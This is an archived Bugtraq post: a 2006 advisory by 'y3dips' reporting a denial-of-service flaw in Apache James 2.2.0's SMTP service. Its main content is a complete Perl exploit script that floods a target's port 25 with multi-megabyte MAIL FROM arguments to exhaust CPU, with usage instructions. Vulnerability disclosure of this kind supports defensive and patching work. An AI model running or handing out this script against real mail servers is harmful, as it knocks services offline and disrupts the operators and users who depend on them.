Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

JAMES 2.2.0 <-- Denial Of Service

from [y3dips] Network Security [Permanent Link]
Subject: JAMES 2.2.0 <-- Denial Of Service
Date: 28 May 2006 10:15:27 -0000 
---------------------------------------------------------------------------
[ECHO_ADV_31$2006] JAMES 2.2.0 <-- Denial Of Service
---------------------------------------------------------------------------

Author       : y3dips a.k.a Ahmad Muammar W.K
Date         : April, 27th 2006
Location     : Indonesia, Jakarta
Web          : http://advisories.echo.or.id/adv/adv31-y3dips-2006.txt

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Application : Java Apache Mail Enterprise Server (a.k.a. Apache James)
version     : 2.2.0
URL         : http://jakarta.apache.org/avalon/phoenix
Description :

The Java Apache Mail Enterprise Server (a.k.a. Apache James) is 
a 100% pure Java SMTP and POP3 Mail server and NNTP News server. 
James also designed to be a complete and portable enterprise mail 
engine solution based on currently available open protocols. 

James is based upon the Apache Avalon application framework. 
(For more information about Avalon, please go to http://avalon.apache.org/)

James requires Java 2 (either JRE 1.3 or 1.4 as of 2.0a3).

----------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~

James SMTP servers are allowing attacker to supply a long variable at 
SMTP argument (such as MAIL) to the SMTP server, because of this 
vulnerability the Processor at server machine will have a workload till 100%


Exploit Code:
~~~~~~~~~~~~~

-------------------------- james.pl-----------------------------------------

#!/usr/bin/perl -w

use IO::Socket;
                                                 
print "* DOS buat JAMES ver.2.2.0 by y3dips *\n";

if(@ARGV == 1)

{
      
      my $host = $ARGV[0];
      my $i = 1;
      
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>"25", 
Reuse=>1) 
or die " Cannot Connect to Server !";

while ( $i++ ) {
print $socket "MAIL FROM:" . "fvclz" x 1000000 . "\r\n" and 
print " -- sucking CPU resources at $host .....\n";
sleep(1);
}
  close $socket;

}  
else
 {  print " Usage: $0 [target] \r\n\n";  }  

---------------------------------------------------------------------------
Shoutz:
~~~~~~~

~ the_day, moby, comex, z3robyte, K-158, c-a-s-e, S`to, lirva32, anonymous
~ newbie_hacker@yahoogroups.com
~ #e-c-h-o @irc.dal.net

---------------------------------------------------------------------------
Contact:
~~~~~~~~

     Ahmad Muammar W.K || echo|staff || y3dips[at]echo[dot]or[dot]id
     Homepage: http://y3dips.echo.or.id/
     Blogs   : http://y3d1ps.blogspot.com/

-------------------------------- [ EOF ] ----------------------------------
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • JAMES 2.2.0 <-- Denial Of Service, y3dips <=
Previous by Date:  multiple file include exploits in EzUpload Pro v2.10, black-cod3
Next by Date:  Advisory: MiniNuke v2.x Multiple Remote Vulnerabilities, Mustafa Can Bjorn IPEKCI
Previous by Thread:  multiple file include exploits in EzUpload Pro v2.10, black-cod3
Next by Thread:  Advisory: MiniNuke v2.x Multiple Remote Vulnerabilities, Mustafa Can Bjorn IPEKCI
Indexes:  [Date] [Thread] [Top] [All Lists]